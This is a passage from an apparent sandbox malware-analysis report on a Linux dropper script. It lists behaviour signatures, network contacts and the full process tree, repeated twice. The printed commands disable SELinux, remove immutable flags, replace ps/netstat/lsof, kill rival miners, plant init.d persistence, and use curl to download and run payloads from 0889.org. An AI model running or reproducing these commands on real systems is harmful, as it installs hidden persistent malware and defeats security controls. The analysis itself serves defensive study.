| File opened for modification | /etc/init.d/sed7tinrF | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedMwLA8Q | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed88r4Bk | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed2KPZCO | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedas3nbc | /bin/sed | N/A |
| File opened for modification | /etc/init.d/selinux | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /etc/init.d/crontabs | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /etc/init.d/sedqUuL8d | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedvbNyP4 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed0q5Utk | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedv6RR3s | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedAnGcRa | /bin/sed | N/A |
| File opened for modification | /etc/init.d/grub | /usr/bin/curl | N/A |
| File opened for modification | /etc/init.d/sedvdRSWB | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedwN5x5f | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedoUuasG | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedL7L6fV | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedkajU1t | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedx1ab42 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed2x3uAc | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed3ewBKk | /bin/sed | N/A |
Write file to user bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /usr/local/sbin/mcron | /usr/bin/curl | N/A |
| File opened for modification | /usr/bin/bsd-port/knerl | /usr/bin/curl | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
Reads runtime system information
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sh-thd.y06k78 | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /tmp/sh-thd.zmSXlf | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
Processes
/tmp/HMtWYpJGZVUZkrQK.sh
[/tmp/HMtWYpJGZVUZkrQK.sh]
/usr/sbin/setenforce
[setenforce 0]
/usr/bin/find
[find / -maxdepth 1 -name *.mod]
/usr/bin/chattr
[chattr -ia /bin/ps]
/usr/bin/chattr
[chattr -ia /usr/bin]
/usr/bin/chattr
[chattr -ia /etc/crontab]
/bin/cp
[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]
/bin/cp
[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]
/bin/cp
[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/exim4]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/sudo]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]
/bin/mount
[mount]
/bin/grep
[grep -o /proc/[0-9]\+]
/usr/bin/sort
[sort -u]
/usr/bin/find
[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/pkill
[pkill awk]
/usr/bin/pkill
[pkill gurb]
/usr/bin/pkill
[pkill pythno]
/usr/bin/pkill
[pkill pythno3]
/usr/bin/pkill
[pkill pythno3.1]
/usr/bin/pkill
[pkill knerl]
/usr/bin/pkill
[pkill system.mark]
/usr/bin/pkill
[pkill system.pub]
/usr/bin/pkill
[pkill netstat.cfg]
/usr/bin/pkill
[pkill bash.cfg]
/usr/bin/pkill
[pkill libgdi.so.0.8.2]
/usr/bin/pkill
[pkill kernel]
/usr/bin/pkill
[pkill linkid]
/usr/bin/pkill
[pkill mcron]
/usr/bin/pkill
[pkill xmrig]
/usr/bin/pkill
[pkill initd]
/bin/cat
[cat]
/bin/cat
[cat]
/bin/chmod
[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]
/usr/bin/chattr
[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]
/bin/mkdir
[mkdir -p /usr/bin/bsd-port /usr/local/sbin]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]
/bin/chmod
[chmod +x /usr/local/sbin/mcron]
/usr/bin/chattr
[chattr +ia /usr/local/sbin/mcron]
/usr/bin/dirname
[dirname /usr/bin/bsd-port/knerl]
/bin/mkdir
[mkdir -p /usr/bin/bsd-port]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/10000 -o /usr/bin/bsd-port/knerl]
/bin/chmod
[chmod +x /usr/bin/bsd-port/knerl]
/usr/bin/chattr
[chattr +ia /usr/bin/bsd-port/knerl]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/grub -o /etc/init.d/grub]
/bin/chmod
[chmod +x /etc/init.d/grub]
/usr/bin/chattr
[chattr +ia /etc/init.d/grub]
/usr/local/sbin/mcron
[/usr/local/sbin/mcron]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | 0889.org | udp |
| GB | 51.143.179.104:80 | 0889.org | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-13 23:20
Reported
2024-11-13 23:23
Platform
debian9-mipsel-20240418-en
Max time kernel
20s
Max time network
22s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /usr/local/sbin/mcron | /usr/local/sbin/mcron | N/A |
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sed | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/sed | N/A |
Disables SELinux
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/sbin/setenforce | N/A |
Enumerates running processes
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/sedcFdtji | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedUWKnOM | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedecL8Uf | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedlS4UXu | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed894o2H | /bin/sed | N/A |
| File opened for modification | /etc/init.d/selinux | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /etc/init.d/sedDJH83P | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed2doE35 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/crontabs | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /etc/init.d/sedUppmtj | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedaOm0nf | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedm74Teg | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed7blsk4 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedmurBwi | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedpQr9ow | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedFiM310 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedlZSDfw | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed0t4SpK | /bin/sed | N/A |
| File opened for modification | /etc/init.d/grub | /usr/bin/curl | N/A |
| File opened for modification | /etc/init.d/sedTtUAO1 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedmnWxVv | /bin/sed | N/A |
Write file to user bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /usr/local/sbin/mcron | /usr/bin/curl | N/A |
| File opened for modification | /usr/bin/bsd-port/knerl | /usr/bin/curl | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
Reads runtime system information
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sh-thd.9HUJKD | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /tmp/sh-thd.fSh6CI | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
Processes
/tmp/HMtWYpJGZVUZkrQK.sh
[/tmp/HMtWYpJGZVUZkrQK.sh]
/usr/sbin/setenforce
[setenforce 0]
/usr/bin/find
[find / -maxdepth 1 -name *.mod]
/usr/bin/chattr
[chattr -ia /bin/ps]
/usr/bin/chattr
[chattr -ia /usr/bin]
/usr/bin/chattr
[chattr -ia /etc/crontab]
/bin/cp
[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]
/bin/cp
[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]
/bin/cp
[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/exim4]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/sudo]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]
/bin/mount
[mount]
/bin/grep
[grep -o /proc/[0-9]\+]
/usr/bin/sort
[sort -u]
/usr/bin/find
[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/pkill
[pkill awk]
/usr/bin/pkill
[pkill gurb]
/usr/bin/pkill
[pkill pythno]
/usr/bin/pkill
[pkill pythno3]
/usr/bin/pkill
[pkill pythno3.1]
/usr/bin/pkill
[pkill knerl]
/usr/bin/pkill
[pkill system.mark]
/usr/bin/pkill
[pkill system.pub]
/usr/bin/pkill
[pkill netstat.cfg]
/usr/bin/pkill
[pkill bash.cfg]
/usr/bin/pkill
[pkill libgdi.so.0.8.2]
/usr/bin/pkill
[pkill kernel]
/usr/bin/pkill
[pkill linkid]
/usr/bin/pkill
[pkill mcron]
/usr/bin/pkill
[pkill xmrig]
/usr/bin/pkill
[pkill initd]
/bin/cat
[cat]
/bin/cat
[cat]
/bin/chmod
[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]
/usr/bin/chattr
[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]
/bin/mkdir
[mkdir -p /usr/bin/bsd-port /usr/local/sbin]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]
/bin/chmod
[chmod +x /usr/local/sbin/mcron]
/usr/bin/chattr
[chattr +ia /usr/local/sbin/mcron]
/usr/bin/dirname
[dirname /usr/bin/bsd-port/knerl]
/bin/mkdir
[mkdir -p /usr/bin/bsd-port]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/10000 -o /usr/bin/bsd-port/knerl]
/bin/chmod
[chmod +x /usr/bin/bsd-port/knerl]
/usr/bin/chattr
[chattr +ia /usr/bin/bsd-port/knerl]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/grub -o /etc/init.d/grub]
/bin/chmod
[chmod +x /etc/init.d/grub]
/usr/bin/chattr
[chattr +ia /etc/init.d/grub]
/usr/local/sbin/mcron
[/usr/local/sbin/mcron]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | 0889.org | udp |
| GB | 51.143.179.104:80 | 0889.org | tcp |
Files